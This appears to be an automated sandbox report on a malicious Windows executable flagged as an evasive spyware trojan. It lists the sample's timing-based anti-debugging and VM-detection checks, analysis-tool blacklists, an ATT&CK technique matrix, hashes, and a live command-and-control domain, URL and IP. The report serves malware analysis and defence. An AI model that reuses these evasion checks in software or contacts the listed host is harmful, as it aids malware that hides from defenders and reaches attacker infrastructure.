Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150BBC second address: 7150BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AEFFh 0x00000009 adc ax, BB8Eh 0x0000000e jmp 00007FD13CB4AF09h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150BFC second address: 7150C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C00 second address: 7150C1E instructions: 0x00000000 rdtsc 0x00000002 mov al, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a and dword ptr [eax], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD13CB4AEFFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C1E second address: 7150C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 18E0D95Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C30 second address: 7150C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C34 second address: 7150C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 715099A second address: 71509A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71509A0 second address: 71509A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E028D second address: 70E02AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02AF second address: 70E02B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02B3 second address: 70E02CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02CE second address: 70E0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13D06371Fh 0x00000009 or ax, F9EEh 0x0000000e jmp 00007FD13D063729h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0302 second address: 70E0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0310 second address: 70E0314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0314 second address: 70E031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E031A second address: 70E032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D06371Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E032C second address: 70E0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Special instruction interceptor: First address: C69D76 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_005D9980 rdtsc 0_2_005D9980
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_003F29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_003F29FF
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: BkB1ur7aFW.exe, 00000000.00000003.1880149923.00000000069C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=;E
Source: BkB1ur7aFW.exe, 00000000.00000003.1987503585.000000000178E000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2030658595.00000000017A0000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1987472785.0000000001781000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1988101952.000000000179F000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1987783680.0000000001792000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll", "w
Source: BkB1ur7aFW.exe Binary or memory string: Hyper-V RAW
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_071103FE Start: 0711041B End: 07110415 0_2_071103FE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_07130840 Start: 07130857 End: 07130851 0_2_07130840
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe File opened: NTICE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe File opened: SICE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe File opened: SIWVID
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Code function: 0_2_005D9980 rdtsc 0_2_005D9980
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ?Program Manager
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\BkB1ur7aFW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| BkB1ur7aFW.exe | 47% | ReversingLabs | Win32.Trojan.Generic | |
| BkB1ur7aFW.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| BkB1ur7aFW.exe | 100% | Joe Sandbox ML | | |
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862j | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot% | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| home.fiveth5ht.top | 5.101.3.217 | true | false | | high |
| httpbin.org | 34.226.108.155 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high |
| https://httpbin.org/ip | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://curl.se/docs/hsts.html | BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862j | BkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://html4/loose.dtd | BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://curl.se/docs/alt-svc.html# | BkB1ur7aFW.exe | false | | high |
| https://httpbin.org/ipbefore | BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html | BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://curl.se/docs/hsts.html# | BkB1ur7aFW.exe | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html# | BkB1ur7aFW.exe | false | | high |
| https://curl.se/docs/alt-svc.html | BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://.css | BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://.jpg | BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot% | BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 34.226.108.155 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false |
| 5.101.3.217 | home.fiveth5ht.top | Russian Federation | | 34665 | PINDC-ASRU | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581386
Start date and time: 2024-12-27 14:52:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BkB1ur7aFW.exe (renamed because original name is a hash value)
Original Sample Name: 5fad6c65b553ca73463694390e2f9301.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: BkB1ur7aFW.exe
No simulations
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 34.226.108.155 | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc | |
| | 3stIhG821a.exe | malicious | LummaC | |
| | 4o4t8dO4r1.exe | malicious | Unknown | |
| | 8wiUGtm9UM.exe | malicious | LummaC | |
| | mBr65h6L4w.exe | malicious | Unknown | |
| | HrIrtCXI3s.exe | malicious | Unknown | |
| | vJPhYDClT5.exe | malicious | Unknown | |
| | jklg6EIhyR.exe | malicious | Unknown | |
| | qr2JeuLuOQ.exe | malicious | Unknown | |
| | gDPzgKHFws.exe | malicious | Cryptbot | |
| 5.101.3.217 | OoYYtngD7d.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | NWJ4JvzFcs.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | EwhnoHx0n5.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | PqHnYMj5eF.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | qZA8AyGxiA.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | 4o4t8dO4r1.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | xXe4fTmV2h.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | lolvgcpX19.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | w6cYYyWXqJ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
| | mBr65h6L4w.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 |
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        home.fiveth5ht.topOoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        httpbin.orgOoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PINDC-ASRU5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 5.101.3.217
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        AMAZON-AESUS5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 34.226.108.155
                                                        db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 34.195.210.183
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        No context
                                                        No context
                                                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.984233838978896
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: BkB1ur7aFW.exe
File size: 4'426'752 bytes
MD5: 5fad6c65b553ca73463694390e2f9301
SHA1: 7a624d02450205c7a89d6397979486873b47be39
SHA256: bad2c4c499a3bb89e8098f5fe7b43cdb248d6e70bb23a07de1ebb83fac880175
SHA512: a8c971d1434c65dc0ee32fca2b4521ca1f86b1784b75fbef557fca7174fa0344204fd9512212dd4c8214a1d6f103c7f955df60eba13bc45a27e8ad844a391c47
SSDEEP: 98304:kqfzsA9ZrTeQtxk/DZvun9EaAN8rvlEUOm+ZpvM5xevOH:kqwA9RTIDp8ma9NkPpk5o0
TLSH: 7E2633C8916117A9C10681B79E27509DFFAAE97D33E744F92CA1F431118FC69B08EEC9
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................x0D...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x100c000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                        Signature Valid:
                                                        Signature Issuer:
                                                        Signature Validation Error:
                                                        Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |  |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0a3a4 | 0x10 | gjdrirkr |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc0a354 | 0x18 | gjdrirkr |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
